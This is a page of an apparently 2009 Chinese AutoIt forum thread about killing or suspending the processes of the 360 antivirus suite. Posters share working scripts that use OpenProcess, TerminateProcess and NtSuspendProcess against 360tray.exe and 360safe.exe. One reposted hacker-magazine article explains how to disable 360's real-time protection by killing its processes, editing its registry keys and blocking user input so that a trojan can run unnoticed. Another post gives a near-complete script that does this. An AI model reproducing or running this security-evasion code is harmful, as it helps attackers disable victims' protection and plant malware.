破帽遮颜 发表于 2009-4-24 16:43:30

能轻易搞定,我会在这发帖?

ceoguang 发表于 2009-4-24 19:29:01


_ProcessSuspend("360tray.exe")
Func _ProcessSuspend($process)
        $processid = ProcessExists($process)
        If $processid Then
                $ai_Handle = DllCall("kernel32.dll", 'int', 'OpenProcess', 'int', 0x1f0fff, 'int', False, 'int', $processid)
                $i_sucess = DllCall("ntdll.dll","int","NtSuspendProcess","int",$ai_Handle)
                DllCall('kernel32.dll', 'ptr', 'CloseHandle', 'ptr', $ai_Handle)
                If IsArray($i_sucess) Then
                        Return 1
                Else
                        SetError(1)
                        Return 0
                Endif
        Else
                SetError(2)
                Return 0
        Endif
EndFunc

破帽遮颜 发表于 2009-4-24 20:32:17

楼上的经过测试,无效!不过还是感谢支持!

ceoguang 发表于 2009-4-24 20:38:33

Func _ProcessResume($process)
        $processid = ProcessExists($process)
        If $processid Then
                $ai_Handle = DllCall("kernel32.dll", 'int', 'OpenProcess', 'int', 0x1f0fff, 'int', False, 'int', $processid)
                $i_sucess = DllCall("ntdll.dll","int","NtResumeProcess","int",$ai_Handle)
                DllCall('kernel32.dll', 'ptr', 'CloseHandle', 'ptr', $ai_Handle)
                If IsArray($i_sucess) Then
                        Return 1
                Else
                        SetError(1)
                        Return 0
                Endif
        Else
                SetError(2)
                Return 0
        Endif
EndFunc恢复进程

xrbenbeba 发表于 2009-4-24 20:40:33

先更改360注册表的权限 然后用system身份结束进程

破帽遮颜 发表于 2009-4-24 22:29:58

用system身份结束进程?

lynfr8 发表于 2009-4-25 05:15:02

本人不才,不过在百度找到唯一一篇关于au3结束360的文章
不敢私藏,和大家分享下,不知对ls仁兄有否借鉴作用
原地址:
http://www.fuck-god.com/Blogs/xuexi/200810/20081024005206.Html

AU3干掉360实时保护
破剑
(发表于黑客防线08年第7期)
最近学习用au3写程序的自动安装脚本,发觉au3很是强大。今天在一个群里一位 兄弟说现在的木马基本都不能过360的实时保护。现在的好多木马都能过主防,但 是都惨败在360的拦截之下。于是我就想pk一把360的实时保护。
去虚拟机安装了360安全卫士,运行我免杀的黑洞服务端,黑洞上线了,过一会360提示添加未知服务。如图1
一点拒绝,服务端立刻下线,查看黑洞的服务状态变为停止。经过测试,得出360是隔一定的时间对特定的地方进行检测,并将结果与上一次的数据进行对比,如果有变化就提示。说明360的实时保护并不实时啊!查看360的实时保护 一共有5种保护,分别是恶意插件入侵拦截,网页防漏及恶意网站拦截,U盘病毒免疫,局域网ARP攻击拦截,系统关键位置保护。默认状态下360开启了除局域网ARP攻击拦截以外的保护,进过分析,拦截木马服务的应该是系统关键位置保护。于是我还原虚拟机后安装360,并关闭360的系统关键位置保护。运行免杀的黑洞后,打开360结果无任何提示,证明了只要360的保护被关闭,再运行我们的木马360的实时防护就成睁眼瞎了。经过我开启和关闭360的关键位址防护的动作对比,发现注册表里有了变化,于是我就直接修改注册表的键值发现360的防御没变化,但是当我退出360,并重新运行360后,发现360的防御状态被更改了。

"ExecAccess"=dword:00000001恶意插件

"SiteAccess"=dword:00000001 网页防漏功能

"MonAccess"=dword:00000000 系统关键位置保护

"UDiskAccess"=dword:00000001 U盘免疫
当值为00000001时打开保护,0000000为关闭保护
于是一个过360的流程就出来了:先结束360的进程,然后修改注册表的键值,关闭360的实时保护,运行木马。还可以在木马运行后,再打开360的防御,免得被人发现。既然最近在用强大的au3进行自动化操作,那么我就想用au3打造一个过360的DD。
安装au3后 ,新建一个文本文档把后缀名修改为au3点右键选择编辑脚本(scitf),就可以写我们过360的代码了。
结束进程
前面说过了要过360 就先干掉他的进程。通过查找帮助结束进程的函数为ProcessClose。使用方法为ProcessClose ( "进程名" [, 标志] )4.1版的360有2个进程一个为360safe.exe另一个为360tray.exe。结束代码如图

但是在测试中发现重新打开360会提示,如图

所以我们就换一个换成xp自己带的工具taskkill来结束它。AU3中运行其他程序的函数有RUN, RUNWAIT两个函数的区别在于RUN直接运行外部程序不等待,直接执 行下一句。RUNWAIT是运行一个外部程序并暂停脚本的执行直至该程序执行完毕。在这里我们两个都可以用。但我们必须要先结束了进程然后修改注册表才有效果,所以为了安全我建议使用RUNWAIT。使用方法为RUNWAIT(“运行的文件名”)由于taskkill是命令行的DD,运行起来的时候会跳出一个黑框框然后消失。那不无疑与告诉别人。嘿,哥们你中招了赶紧杀毒吧!AU3提供隐藏窗口的函数@SW_HIDE。帮助手册给他定义为:隐藏指定窗口并激活其它窗口。用他来影藏窗口就完美了。完整的命令如图

注册表
进程结束完了,继续修改注册表。AU3修改注册表的函数使用RegWrite直接通过写入的方法来进行修改键值试用格式为RegWrite ( "键名" [,"值项", "类型", 数据] )
注册表可以把全部的保护关闭,也可只关闭系统关键位置保护。

运行木马
360的实时保护经过上面的处理已经变成残废了,现在直接运行我们的木马就安全了,用run runwiat都可以。
隐蔽au3运行的图表
默认情况下au3运行在右下脚会有一个黑色的小球图标,脚本运行完毕后自动退出。从脚本开始到木马结束的话时间也不短的,所以要隐藏AU3的运行图表在编写的脚本第一行加上#NoTrayIcon即可隐藏图标
键鼠锁定
由于au3在自动运行时,键盘鼠标的操作有可能会导致脚本中断,所以有必要对键盘鼠标进行暂时锁定,锁定函数为BlockInput1 = 屏蔽用户输入0 = 启用用户输个人觉得在#NoTrayIcon执行后执行键盘锁定最好,所以在#NoTrayIcon后输入BlockInput(1),键盘一旦锁定会屏蔽用户的一切输入,在脚本执行完毕后必须进行解锁,不然只有重启计算机后键盘鼠标才可进行操作,BlockInput 为键鼠解锁函数参数和BlockInput一样,BlockInput(0)我建议在在最后的一行加上这句代码。
最终代码为

经过上面的几步我们把工作已经做完了,将写好的脚本编译为EXE即可。点工具下的编译脚本或者按ctrl+f7然后指定保存路径后即可编译成功。然后将编译后的文件和木马放到一起将你的木马改名为第3部中run后的文件名即可然后制作成rar自解压包。如果不会制作自解压包的朋友,请自行查找相关资料。
以上这个方法只是个思路,会编程的朋友就更容易实现这个了。编译出的文件应该会更小的

pusofalse 发表于 2009-4-25 09:05:07

本帖最后由 pusofalse 于 2009-4-25 09:22 编辑

简单的用ProcessClose并不能关闭开启自我保护的360进程,可能hook了api了吧~?
但用TerminateProcess却可以,在本机试验成功。关键是打开进程句柄时所需要的OpenProcess函数和它的第一个参数AccessRights~~$h360Safe = _OpenProcess("360Safe.exe", 0x10000000)
_TerminateProcess($h360Safe, 0)
$h360Tray = _OpenProcess("360Tray.exe", 0x10000000)
_TerminateProcess($h360Tray, 0)


Func _OpenProcess($iProcessId, $iAccess, $iInherit = 0)
        Local $hProcess

        $iProcessId = ProcessExists($iProcessId)
        $hProcess = DllCall("Kernel32.dll", "hWnd", "OpenProcess", _
                        "dword", $iAccess, "int", $iInherit, "int", $iProcessId)
        Return $hProcess
EndFunc        ;==>_OpenProcess()


Func _TerminateProcess($hProcess, $iExitCode)
        Local $iResult
        $iResult = DllCall("Kernel32.dll", "int", "TerminateProcess", _
                        "hWnd", $hProcess, "uint", $iExitCode)
        Return $iResult <> 0
EndFunc        ;==>_TerminateProcess()

ceoguang 发表于 2009-4-25 18:20:15

回楼上,早就测试过了,TerminateProc不能关闭,除非没开户自我保护.以下是初期测试代码.

$sProcess = "360tray.exe"
$ProcessPid = ProcessExists($sProcess)
$ProcHandle = DllCall("kernel32.dll", "hwnd", "OpenProcess", "dword", BitOR(0x0400, 0x0004, 0x0001), "int", 0, "dword", $ProcessPid)
$pStruct = DllStructCreate("dword")
$ProcTerminate = DllCall("kernel32.dll", "int", "TerminateProcess", "hwnd", $ProcHandle, "uint",DllStructGetData($pStruct,1))

ceoguang 发表于 2009-4-25 18:33:56

本帖最后由 ceoguang 于 2009-4-25 18:34 编辑

搞错,不好意思,原来是OpenProcess权限问题.

$sProcess = "360tray.exe"
$ProcessPid = ProcessExists($sProcess)
$ProcHandle = DllCall("kernel32.dll", "hwnd", "OpenProcess", "dword", 0x10000000, "int", 0, "dword", $ProcessPid)
$ProcTerminate = DllCall("kernel32.dll", "int", "TerminateProcess", "hwnd", $ProcHandle, "uint",0)

lpxx 发表于 2009-4-25 21:29:06

搜来的,不知是否有用ProcessClose("360safe.exe")
ProcessClose("360tray.exe")
#NoTrayIcon
BlockInput(1)
RunWait(@ComSpec & " /c " & 'taskkill /f /im "360tray.exe"',"",@SW_HIDE)
RunWait(@ComSpec & " /c " & 'taskkill /f /im "360safe.exe"',"",@SW_HIDE)
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon","ExecAccess","REG_DWORD","00000001")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon","SiteAccess","REG_DWORD","00000001")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon","MonAccess","REG_DWORD","00000000")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon","ExecAccess","UDiskAccess","00000000")
Run(@ProgramFilesDir & "\Internet Explorer\iexplore.exe www.autoitx.com")
BlockInput(0)

lynfr8 发表于 2009-4-25 22:43:06

上面那段估计行不通,跟帖都说过用taskkill和修改注册表都无法搞定360的自我保护

lynfr8 发表于 2009-4-25 22:43:13

上面那段估计行不通,跟帖都说过用taskkill和修改注册表都无法搞定360的自我保护

hlzxcjx 发表于 2009-4-25 23:04:02

搞错,不好意思,原来是OpenProcess权限问题.

$sProcess = "360tray.exe"
$ProcessPid = ProcessExists($sProcess)
$ProcHandle = DllCall("kernel32.dll", "hwnd", "OpenProcess", "dword", 0x10000000, "i ...
ceoguang 发表于 2009-4-25 18:33 http://www.autoitx.com/images/common/back.gif
本人测试成功了!
如法炮制,结束瑞星及其防火墙进程,不成功!:face (33):

ceoguang 发表于 2009-4-26 00:04:14


本人测试成功了!
如法炮制,结束瑞星及其防火墙进程,不成功!:face (33):
hlzxcjx 发表于 2009-4-25 23:04 http://www.autoitx.com/images/common/back.gif
试试将$ProcTerminate = DllCall("kernel32.dll", "int", "TerminateProcess", "hwnd", $ProcHandle, "uint",0)的最后一个参数改为3或4看看,不然就只能向其发送虚假的关机命令了.
页: 1 [2] 3 4 5
查看完整版本: 谁能用AU3搞定360的进程?